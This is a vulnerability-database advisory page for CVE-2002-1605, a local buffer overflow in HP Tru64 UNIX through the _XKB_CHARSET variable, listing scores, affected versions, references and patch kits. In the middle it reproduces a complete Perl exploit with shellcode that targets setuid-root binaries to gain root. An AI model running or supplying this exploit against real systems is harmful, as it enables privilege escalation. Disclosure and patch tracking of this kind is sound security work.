CVE-2002-1605
CVSS 7.5
Published: 2002-09-02 00:00:00
Last revised: 2011-03-07 21:10:31

[Original] Buffer overflow in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f allows attackers to execute arbitrary code via a long _XKB_CHARSET environment variable to (1) dxpause, (2) dxconsole, or (3) dtsession.


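[CNNVD] HP Tru64 _XKB_CHARSET Local Buffer Overflow Vulnerability (CNNVD-200209-001)

        A buffer overflow vulnerability exists in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f. An attacker can execute arbitrary code via an overlong _XKB_CHARSET environment variable passed to (1) dxpause, (2) dxconsole, or (3) dtsession.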

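- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]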

- CPE (affected platforms and products)

cpe:/o:hp:tru64:5.1    HP Compaq Tru64 5.1
cpe:/o:hp:tru64:4.0g    HP Tru64 4.0g
cpe:/o:hp:hp-ux:11.22    HP-UX 11i v1.6
cpe:/o:hp:hp-ux:11.04    HP HP-UX 11.04
cpe:/o:hp:tru64:4.0f    HP Tru64 4.0f
cpe:/o:hp:hp-ux:11.00    HP-UX 11.00
cpe:/o:hp:tru64:5.0a    HP Tru64 5.0a
cpe:/o:hp:tru64:5.1a    HP Tru64 5.1a
cpe:/o:hp:hp-ux:10.20    HP HP-UX 10.20
cpe:/o:hp:hp-ux:11.11    HP-UX 11.11

- OVAL (technical details used for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1605
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1605
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-001
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/693803
(VENDOR_ADVISORY)  CERT-VN  VU#693803
http://www.kb.cert.org/vuls/id/584243
(VENDOR_ADVISORY)  CERT-VN  VU#584243
http://www.kb.cert.org/vuls/id/569987
(VENDOR_ADVISORY)  CERT-VN  VU#569987
http://xforce.iss.net/xforce/xfdb/10016
(UNKNOWN)  XF  tru64-multiple-binaries-bo(10016)
http://www.securityfocus.com/archive/1/290115
(UNKNOWN)  BUGTRAQ  20020902 Happy Labor Day from Snosoft
http://www.blacksheepnetworks.com/security/hack/tru64/TRU64_xkb.txt
(UNKNOWN)  MISC  http://www.blacksheepnetworks.com/security/hack/tru64/TRU64_xkb.txt
http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
(UNKNOWN)  FULLDISC  20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification
http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11
(UNKNOWN)  HP  SSRT2275

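- Vulnerability information

HP Tru64 _XKB_CHARSET Local Buffer Overflow Vulnerability
High risk  Buffer overflow
2002-09-02 00:00:00 2005-10-20 00:00:00
Local
        A buffer overflow vulnerability exists in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f. An attacker can execute arbitrary code via an overlong _XKB_CHARSET environment variable passed to (1) dxpause, (2) dxconsole, or (3) dtsession.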

- Advisories and patches

        HP has released fixes for Tru64 UNIX/TruCluster systems. Note that appropriate patchkits must be applied.

        Compaq Tru64 4.0 g PK3 (BL17)
        Compaq Tru64 4.0 f PK7 (BL18)
        Compaq Tru64 5.0 a PK3 (BL17)
        Compaq Tru64 5.1 a PK2 (BL2)
        Compaq Tru64 5.1 PK5 (BL19)

- Vulnerability information (21774)

HP Tru64 4.0/5.0/5.1 _XKB_CHARSET Local Buffer Overflow Vulnerability (EDBID:21774)
unix local
2002-07-10 Verified
0 stripey
N/A
source: http://www.securityfocus.com/bid/5648/info

Tru64 is a commercially available Unix operating system originally developed by Digital. It is distributed and maintained by HP.

A buffer overflow has been discovered in the _XKB_CHARSET library. A number of programs depend on the library, including dxconsole, dxpause and dtsession. Because of this flaw, it may be possible for a local user to execute arbitrary instructions. This could lead to the execution of attacker-supplied code, and elevated privileges. 

#!/usr/bin/perl -w
#
# Tru64 5.1 _XKB_CHARSET
#
# stripey (stripey@snosoft.com) - 10/07/2002
#                                 

$tgts{"0"} = pack("l",0x40010250).":/usr/bin/X11/dxconsole:uid=root";
$tgts{"1"} = pack("l",0x40012584).":/usr/bin/X11/dxpause:uid=root";
$tgts{"2"} = pack("l",0x400101e4).":/usr/dt/bin/dtsession:euid=root";
                                  
unless (($target,$offset,$align) = @ARGV,$align) {           
                                  
        print "-"x72;
        print "\n      Tru64 _XKB_CHARSET overflow, stripey\@snosoft.com, 03/07/2002\n";
        print "-"x72;
        print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
                                  
        foreach $key (sort(keys %tgts)) {
                ($a,$b,$c) = split(/\:/,$tgts{"$key"});
                print "\t$key. $b ( $c )\n";
        }
       
        print "\n";
        exit 1;
}             

($a,$b) = split(/\:/,$tgts{"$target"});
                                  
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
                                  
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);              
                                  
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";               
                                  
$buf_a  = "A"x256;
$buf_a .= $ret;

$buf_b  = "B"x$align;
if ($target eq "2" ) {     
        $buf_b .= pack("l",0x47ff041f)x56;
} else {
        $buf_b .= pack("l",0x47ff041f)x3750;
}
$buf_b .= $sc;                        
    
$ENV{"_XKB_CHARSET"} = $buf_a;
$ENV{"HOME"} = $buf_b;       
                    
exec("$b");          

		

- Vulnerability information

18185
HP Tru64 UNIX dtsession _XKB_CHARSET Environment Variable Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-09-02 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

HP Tru64 _XKB_CHARSET Local Buffer Overflow Vulnerability
Boundary Condition Error 5648
No Yes
2002-08-30 12:00:00 2009-07-11 03:56:00
These issues were initially published in a HP Security Bulletin. Discovery is credited to Snosoft.

- Affected program versions

Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 a
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f
Compaq Digital Unix 4.0 f

- Vulnerability discussion

Tru64 is a commercially available Unix operating system originally developed by Digital. It is distributed and maintained by HP.

A buffer overflow has been discovered in the _XKB_CHARSET library. A number of programs depend on the library, including dxconsole, dxpause and dtsession. Because of this flaw, it may be possible for a local user to execute arbitrary instructions. This could lead to the execution of attacker-supplied code, and elevated privileges.

- Exploit

The following exploit was provided by stripey <stripey@snosoft.com>:

- Solution

HP has released fixes for Tru64 UNIX/TruCluster systems. Note that appropriate patchkits must be applied.


Compaq Tru64 4.0 g PK3 (BL17)

Compaq Tru64 4.0 f PK7 (BL18)

Compaq Tru64 5.0 a PK3 (BL17)

Compaq Tru64 5.1 a PK2 (BL2)

Compaq Tru64 5.1 PK5 (BL19)

- Related references

 

 
